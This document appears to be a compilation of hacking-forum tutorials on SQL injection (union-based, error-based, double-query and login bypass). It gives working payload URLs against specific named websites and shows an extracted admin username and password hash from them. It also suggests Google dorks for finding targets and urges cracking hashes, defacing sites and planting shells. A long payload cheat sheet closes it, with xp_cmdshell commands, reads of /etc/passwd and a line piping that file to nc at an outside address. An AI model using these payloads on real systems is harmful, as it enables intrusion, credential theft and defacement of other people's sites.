Union Based SQL Injection

 

SQL Injection is defined by

"The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."

1) Find a site that Uses PHP. It should end in (ex.) …php?id=... or …php?p=… (etc.) Then type in the end (or before the last number) ‘. (Single Quote)

ex. http://www.mysite.com/game.php?id=1′;

If you get an error, you may proceed. (Means that the Site is Vulnerable!)

2) Erase the single quote you typed before, and type at the end order by 1– and the number shows the number of the tables that the database of the site has.

ex. .com/game.php?id=1 order by 1–(It shouldn’t get any error…)

3) Continue typing numbers (2,4,5,7 etc…) until it get an error. The last number that doesn’t get error is the number of the tables that the Database has!

ex. our site has 4 tables when: 
id=1 order by 5– (gets an error)
id=1 order by 4– (doesn’t get error) – So, the number of tables the Site’s database has is 4!

4) this (in our example) will display the table that are vulnerable.
union all select 1,2,3,4–

ex. http://www.site.com/game?id=-1 union all select 1,2,3,4–

(You should see many Numbers at many different areas of the page. – These numbers are the numbers of the vulnerable tables)

5) to find the version of the SQL type @@version instead of the vulnerable table number that is at the top (ALWAYS AT THE TOP). 
union all select 1,2,@@version,4–

ex. id=-1 union all select 1,2,3,@@version– (if the 3rd table is vulnerable and is at the top – if it is NOT the one that is at the top of the other numbers, the attack will not succeed!)

You should see the MySQL version of the Site. It should be 5.+. If it is less than 5, we need other methods to extract information.

6) to display Table Names type:

ex. union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()–

(You see that the SQL Command is inserted at the vulnerable table we got at the “Union all Select” Statement – in our example ‘4‘) — Don’t freak out if it is difficult for you to learn the commands! Take notes and you will learn them after a while…

7) To display the Collum Names we type:

ex. union all select 1,2,3,group_concat(collumn_name) from information_schema.collumns where table_name=CHAR(117, 115, 101, 114, 115)–

The CHAR() is a MySQL Function. You can get the HackBar Add-On for Firefox that can convert a string (like ‘users’) to the appropriate format!

The CHAR() contains Numbers which are the converted format of the Table we need. In this example, “users”

8) To display the collumns we want (let’s say “username” and “password”) from a table (let’s say “users”) we type:

ex. union all select 1,2,group_concat(username,0x3a,password),4 from users–

username: collumn to display
password: collumn to display
0x3a: HEX Character: says the browser to display the info like this: user:pass 
users: table to search

NOTE: The passwords are usually in MD5 hash encryption (or SHA-1). Use a Service to unhash it! Like: 
http://www.md5decrypter.co.uk/

That’s it! This was the Union-Based SQL Injection!

Note:

All information on this forum is for educational purposes only.

WE are not responsible for any attacks that are carried out on networks, websites or servers.

 

Read more...

Error Based/Double Query SQL injection

Alright I'll make this tutorial as short as possible so that you can understand faster.

Understanding Error Based/Double Query
How does Error Base and Double Query work
Error Based:

Code:

A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information

Double Query:

Code:

Basically like Error Based, except that the Error Based Query will be doubled as a single query statement so that we'll get errors with information in it

I'll explain further in this tutorial
Anyways, focus on this part of this tutorial
Error Based IS Double Query
Error Based = Double Query (Error based 2x)

---

---

---

How do you know you should use Error Based/Double Query? (Important!)
This is the most important part of web hacking; the type of injection to use in different situations.
You can use Error Based/ Double Query Injections in the following errors you get

Code:

a. The Used Select Statements Have  Different Number Of Columns.
b. Unknown Column 1 or no columns at all (in webpage and page source)
c.Error #1604

Now take note of those errors. You'll be needing it 

---

---

---

Lets start with Error Based SQL injection
Alright for this lesson, we'll use this site as an example:
http://www.aliqbalschools.org

First approach is knowing the version of the database

To do that we enter this query after the end of the URL

Code:

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

So the site will look like this

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

Results:

Now that we know the version of the database which is 5, lets move to the next step

---

---

---

Second step: Getting the database name
To get the database, we enter this query

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Notice the limit function in the query
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1

Now our website address will look like this

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:

Database is : iqbal_iqbal

Second step is done where we extract the database names we need.
MAKE sure you write the database name on a paper or notepad
We'll need it later

---

---

---

Third Step: Getting the TABLE NAMES
Table names is what we need now
Here's the query we can use:

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Don't also forget the LIMIT function we used here to get table names one by one

Alright our web address will look like this:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now here's the important part:
When you search for tables keep incrementing the limit until you find the valuable table name
For example: LIMIT 0,1 
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from
Here's the formula: LIMIT N,1 where N is a random integer

Valuable Tables can be:

Code:

Users
Admin
user
administrator
tbladmin
tblusers
settings

In this case, we have the table "settings"
So now we know our table, lets move on to the next step

---

---

---

Fourth Step: Getting Columns from specific TABLE NAMES
Alright, now that you've chosen the table you wanna extract columns from, time to execute another query
So here's how a column query extraction will look like:

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Notice the LIMIT 0,1 FUNCTION and 0xTABLEHEX
You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's how the address will look like along with the query

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:

Code:

Duplicate entry 'Id~1' for key 'group_key

Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Column name= passWord

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Again, don't forget to see the LIMIT Function
Now that we found the columns we want to extract information from i.e "userName" and "passWord", lets proceed to the next step where we can actually get the login username and password

---

---

---

Fifth Step: Extracting the data from Columns
Alright this part is probably the best in SQL injecting site.
Time to get the info from the columns we have
To do that, use this query

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now before you proceed, watch and focus on the code and study what happens.
Here we have 4 variables:
1. COLUMN_NAME: where you insert the column name you want to extract information from
2.Databasename: where you insert the current database name of the website so that you'll be extract info from it
3. TABLENAME: where you insert the table name of the column names you extracted from
4. LIMIT N,1: LIMIT Function and N where N is a random integer
Now lets do some replacing, FOCUS

Code:

COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"

After you're done with altering the code to your needs of extracting information, time to execute it
Here's what the code will look like:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:

Code:

Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key

SUCCESS, you injected the site with error based now you have the login info
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash

---

---

---

Now Lets Start with DOUBLE Query SQL Injection
So basically, as stated above, DOUBLE Query is the same like Error Based except the query we'll enter is gonna be double the normal error based query
First off, the definition so that you can understand:

Code:

Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.

Differences:
Error Based Query for Database Extraction:

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Double Query for Database Extraction:

Code:

and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

Now you get the idea, lets cut to the chase and go on
We'll be using the same site as above

---

---

---

Step1: Getting the database version
Alright same as Error Based, here's the Double query:

Code:

and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

So our Address will look like this:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

NOTE(IMPORTANT): Make sure that your queries are very well organized when you execute them, otherwise the browser will return the results as an error.

Results after query execution:

Code:

Duplicate entry '~'5.1.56-log'~1' for key 'group_key

Database version is 5
You can test on the site now if you want so that you won't get confused

---

---

---

Step2: Getting the Database
Now we've got the version, lets execute a double query on extracting the database
Query for Database extraction:

Code:

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Notice the LIMIT Function again and make sure you don't make mistakes in that
It shows that
Limit N,1 where N is a random integer. Example: Limit 0,1

Here's what our address will then look like:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Once more, don't forget about the LIMIT Function

So here's the results:

Code:

iqbal_iqbal

Now that's their database.
Note it down on a notepad or a paper

---

---

---

Step3: Getting the Table Names
As I've explained above, we'll be also using the LIMIT Function in this query.
Just a quick look, the query will look like this:

Code:

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

Alright you need to focus on the code and see the changes.
There are two variables here:
1. Hex_code_databasename
2. LIMIT Function

Obviously, we need to Hex the database name we've just taken into record and add 0x in the beginning i.e. Database= 0xiqbal_iqbal
To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php
Now that you've the database into hex, lets see what our address will look like:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

LIMIT 19,1 brings us the valuable table which is "settings"
Review the code and study it

---

---

---

Step4: Getting Column names from specific Tables and Database
Now that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extraction
Here's what the query will look like:

Code:

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now here we have 3 variables:
1. Hex code of Databasename: Hex the database which in our case is (iqbal_iqbal)
2. Hex code of tablename: Hex the table name which is "settings"
3. LIMIT Function
Alright, I'm pretty sure you know what you have to do exactly so I don't need to explain everything again and again.

Here's what the address is gonna look like:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Notice the hexed variables and the LIMIT Function
Keep incrementing the LIMIT until you find the valuable columns which in our case is "userName" and "passWord"
Review what we have just done for less confusion

---

---

---

Step5: Getting the Data from the Columns with the help of Table name and Database name
Alright now that we know what we need to extract, lets get our goods
As far as what we're injected in the site, this is our information:
database name: iqbal_iqbal
table name: settings
column names: userName, passWord

Here's what the query will look like first (for extracting data):

Code:

and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Variables:
table_name.column_name: Input the table name and column name you want to extract information from

database_name.table_name: Input the database name and table name you want to extract information from

LIMIT Function: Increment until you find the data you need

So here's what our address is gonna look like when we extract details from userName

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:

Code:

admim

Query for extracting details from passWord

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:

Code:

86f574c1d63d53fa804c13c3213953d9

Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9

Alright I think that's pretty much what you have to know about Error Based/Double Query SQL injection.

Note:

All information on this forum is for educational purposes only.

WE are not responsible for any attacks that are carried out on networks, websites or servers.

 

Read more...

ERROR BASED SQLI

 

 

Hey guys,
I'll be explaining another type of Error Based SQL injection.
It's definitely another type but in this case, I call it Union-Error based, since it involves Union Select in the queries we're about to use.

So let's get started

 

In this example we're gonna be using this site (which was asked by a member in -Downfall's thread):

 

Code:

http://www.seenpm.org/

 

The vulnerable link would be:

 

Code:

http://www.seenpm.org/new/index.php?id=151'

 

Before I go further, let me explain some of the SQL functions we're gonna be using in this tutorial, so that you'll have an idea how the query works. Please read carefully

 

Code:

count(*) = Returns the total number of records in the table/view
group by = Groups the result of the query set by one or more columns
concat = shows the results in one column
information_schema = The default database
table_schema = Specified database
table_name = The current table name
limit = Limits the amount of content to be displayed
mid() = Used to extract characters from a text field

 

See more of the functions here:
http://www.w3schools.com/sql/sql_functions.asp

 

---

 

NOTE: Make sure to organize the query if you're just gonna copy and paste!
There could be some spaces in between
Getting the version of their database (2 main ways to do it):
First way:
Query:

 

Code:

+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

 

URL will look like:

 

Code:

http://www.seenpm.org/new/index.php?id=151+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

 

Results:

 

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'

 

Second way:
Query:

 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ ​schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

URL will look like:

 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+f ​rom+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

Results:

 

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'

 

Screenshot: 

 

 

---

 

Now that we've got the version, let's extract the database:

Query used:

 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+f ​rom+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

URL will look like this:

 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(sche ​ma_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

Results:

 

Code:

Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'

 

Note: Notice the limit 0,1),1,150)
This is the part where I raised the ascii from 25 to 150, just in case there would have been more database
I'll explain more about the mid() function in the next step

Screenshot: 

 

 

We have the database and version so far

 

---

 

Now for the tables in their current database

Query:

 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+fr ​om+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

URL:

 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl ​e_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

Results:

 

Code:

'links,members,menu,menu_s1' for key 'group_key'

 

Now read this carefully, notice how the tables aren't completely shown.
Only about half of em are shown. This is because of the mid() function we're using.

Leave the limit 0,1 function and don't touch it

What you need to alter now is the integers of the mid() function
i.e (mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_sche ​ma.tables where table_schema=database() limit+0,1),1,25)

Yes, that's right. Notice 1,25
25 can also be altered, however it's a moderate value, so leave it like that
Now, the number "1" shows the tables as soon as it's being altered.
Incrementing is what's being needed here
Lets just say, 15,25
It'll display the rest of the other tables

I've done a bit of a reckon on the site and found out that the 'users' table is located at 58,25

So the query with the URL will look like:

 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl ​e_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x

 

Results:

 

Code:

Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'

 

Screenshot:

 

 

---

 

Now for the columns in the specified table i.e users

Query:

 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+f ​rom+information_schema.columns where table_name=0xHex_Table limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

Notice you have to convert the current table to Hex.
To do that, you can go to http://www.swingnote.com/tools/texttohex.php

URL:

 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(colu ​mn_name),0x7e)+from+information_schema.columns where table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

Now notice the mid() function
I've incremented from 1,25 to 4,25

Result:

 

Code:

'username,password,email,n1' for key 'group_key'

 

Screenshot: 

 

 

---

 

Now to extract the data from the desired columns
Columns we have so far: "username", "password"

Query:

 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,passwo ​rd),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

URL:

 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(user ​name,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x

 

Results:

 

Code:

Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'

 

Notice how I didn't increment the mid() function
This because the content is completely shown
Note: You can know that the data is completely shown when there is a ~ sign or signs

Screenshot:

 

 

 

Note:

All information on this forum is for educational purposes only.

 WE are not responsible for any attacks that are carried out on networks, websites or servers.

 

Read more...

BASIC SQL INJECTION WITH LOGIN QUERIES

 

Alright in this tutorial, we'll be learning how to bypass login pages with the help of My Sequel injection using Login Queries. 

 

What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:

 

Code:

Username: admin
Password: ‘ or ‘1’=’1

 

When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query

 

PHP Code:

SELECT * FROM users
WHERE username = ‘admin’AND password = ‘ ‘ or ‘1’=’1’ 

 

In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect. 
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we 

 

Step1: Finding websites with Login Pages
Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
In this tutorial, we can use these dorks:

 

Code:

inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html

 

If you want to find more dorks when using this method, you can find them in google:

 

Step2: Now Executing the query

 

Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases

 

Code:

Username: admin
Password: ' or 0=0 --

 

Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.

 

Code:

• ' or '1'='1


• ' or 'x'='x


• ' or 0=0 --


• " or 0=0 --


• or 0=0 --


• ' or 0=0 #


• " or 0=0 #


• or 0=0 #


• ' or 'x'='x


• " or "x"="x


• ') or ('x'='x


• ' or 1=1--


• " or 1=1--


• or 1=1--


• ' or a=a--


• " or "a"="a


• ') or ('a'='a


• ") or ("a"="a


• hi" or "a"="a


• hi" or 1=1 --


• hi' or 1=1 --


• 'or'1=1'


• ==


• and 1=1--


• and 1=1


• ' or 'one'='one--


• ' or 'one'='one


• ' and 'one'='one


• ' and 'one'='one--


• 1') and '1'='1--


• admin' --


• admin' #


• admin'/*


• or 1=1--


• or 1=1#


• or 1=1/*


• ) or '1'='1--


• ) or ('1'='1--


• ' or '1'='1


• ' or 'x'='x


• ' or 0=0 --


• " or 0=0 --


• or 0=0 --


• ' or 0=0 #


• " or 0=0 #


• or 0=0 #


• ' or 'x'='x


• " or "x"="x


• ') or ('x'='x


• ' or 1=1--


• " or 1=1--


• or 1=1--


• ' or a=a--


• " or "a"="a


• ') or ('a'='a


• ") or ("a"="a


• hi" or "a"="a


• hi" or 1=1 --


• hi' or 1=1 --


• 'or'1=1'

 

Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.

 

Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website

 

 

Extras:
Common Password Queries:

 

Code:

• admin' --


• admin' #


• admin'/*


• ' or 1=1--


• ' or 1=1#


• ' or 1=1/*


• ') or '1'='1--


• ') or ('1'='1--

 

If version of Database is greater than 5, then queries with UNION,group, @@version,orderby,benchmark etc can be executed

 

Code:

• 1234' AND 1=0 UNION ALL SELECT 'admin'


• ' HAVING 1=1 --


• ' GROUP BY table.columnfromerror1 HAVING 1=1 --


• @@version


• select @@version


• select @@servername


• select @@microsoftversion


• select * from master..sysservers


• select * from sysusers


• exec master..xp_cmdshell 'ipconfig+/all'


• exec master..xp_cmdshell 'net+view'


• exec master..xp_cmdshell 'net+users'


• SELECT 1 -- comment


• SELECT /*comment*/1


• ORDER BY 1--


• ' union all select sum(columntofind) from users--


• UNION ALL SELECT null


• SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')


• SELECT TOP n columns


• select * from OPENROWSET('MSDASQL'


• select * from OPENROWSET('SQLOLEDB'


• masters..sysxlogins


• sys.sql_logins


• SELECT/*avoid-spaces*/password/**/FROM/**/Members


• SELECT CHAR(0x66)


• SELECT * FROM members


• @@version


• SELECT USER();


• select host


• SELECT 1;


• SELECT /*comment*/1;


• ORDER BY 1--


• UNION ALL SELECT null


• SELECT schema_name FROM information_schema.schemata;


• SELECT table_schema


• SELECT grantee


• limit 1


• SELECT host


• IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100


• select benchmark( 500


• SELECT CHAR(75)+CHAR(76)+CHAR(77)


• SELECT ascii('A')


• SELECT CONCAT('0x'


• SELECT/*avoid-spaces*/password/**/FROM/**/Members


• SELECT /*!32302 1/0


• SELECT 0x5045


• SELECT cast('1' AS unsigned integer);


• SELECT cast('123' AS char);


• SELECT IF(1=1


• ' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a


• union SELECT LOAD_FILE(0x2f6574632f706173737764)


• load data infile 'c:/boot.ini' into table foo;


• # SELECT ... INTO DUMPFILE


• SELECT login || '-' || password FROM members


• select versionnumber


• select user from sysibm.sysdummy1;


• select session_user from sysibm.sysdummy1;


• select system_user from sysibm.sysdummy1;


• select * from syscat.tabauth;


• select current server from sysibm.sysdummy1;


• select * from syscat.dbauth where grantee = current user;


• select * from syscat.tdbauth where grantee = current user;


• select name from sysibm.systables;


• select name


• SELECT schemaname FROM syscat.schemata;


• SELECT foo FROM bar fetch first 1 rows only;


• select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;


• select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;


• SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;


• SELECT cast(’123' as integer) FROM sysibm.sysdummy1;


• select version();


• select current_database();


• "select current_user;


• select session_user;


• "SELECT current_setting('data_directory');


• select current_setting(’log_connections’);


• select current_setting(’log_statement’);


• "select current_setting(’port’);


• select current_setting(’password_encryption’);


• select current_setting(’krb_server_keyfile’);


• "select current_setting(’virtual_host’);


• select current_setting(’port’);


• "select current_setting(’config_file’);


• "select current_setting(’hba_file’);


• "select current_setting(’data_directory’);


• LIMIT n


• SELECT pg_sleep(10);


• SELECT current_database()


• SELECT relname


• SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'


• SELECT DISTINCT relname FROM pg_class C


• SELECT 1; --comment


• SELECT /*comment*/1;


• SELECT chr(65);


• SELECT ascii('A');


• SELECT CHR(65)||CHR(66);


• SELECT usename


• SELECT usename FROM pg_user WHERE usesuper IS TRUE


• SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');


• SELECT 'A' || 'B';


• SELECT CAST(1 as varchar);


• SELECT CAST('1' as int);


• SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'


• select dbmsinfo(’_version’);


• select dbmsinfo(’session_user’);


• select dbmsinfo(’system_user’);


• select dbmsinfo(’database’);


• select dbmsinfo(’db_admin’);


• select dbmsinfo(’create_table’);


• select dbmsinfo(’create_procedure’);


• select dbmsinfo(’security_priv’);


• select dbmsinfo(’select_syscat’);


• select dbmsinfo(’db_privileges’);


• select dbmsinfo(’current_priv_mask’);


• select top 10 blah from table;


• select first 10 blah form table;


• select table_name


• select relid


• select relid


• select column_name


• select 1 union select 2;


• select cast(’123' as integer);


• select @@version"


• select name from master..syslogins"


• select name from master..sysdatabases"


• convert(integer


• waitfor delay '0:0:5'

 

